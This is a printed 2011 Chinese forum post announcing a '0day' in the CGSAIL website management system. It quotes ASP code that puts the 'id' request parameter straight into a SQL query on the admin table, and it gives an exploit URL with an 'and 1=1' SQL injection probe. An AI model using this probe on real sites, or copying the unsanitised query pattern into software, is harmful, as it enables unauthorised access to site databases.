Board logo

标题: [漏洞]CGSAIL网站管理系统 0day [打印本页]

作者: 宇宙沉淀    时间: 2011-5-4 06:25     标题: [漏洞]CGSAIL网站管理系统 0day




本文作者:fjhgx

 


<!--#include file="lockip/lockyou.asp"-->
<!--#include file = cgsail_conn.asp -->
<!--#include file = Include/cgsail_pub_cls.asp -->
<%
dim sql
dim rs
sql = "select * from ["&CgsailPrefix&"admin] where id="&request("id")
Set rs = Server.CreateObject("ADODB.RecordSet")
rs.Open sql,conn,1,1


photo=trim(rs("photo"))


%>


 


 


exp:
http://localhost/user_view.asp?id=1%20and%201=1






欢迎光临 ::电驴基地:: (https://www.cmule.com/) Powered by Discuz! 6.0.0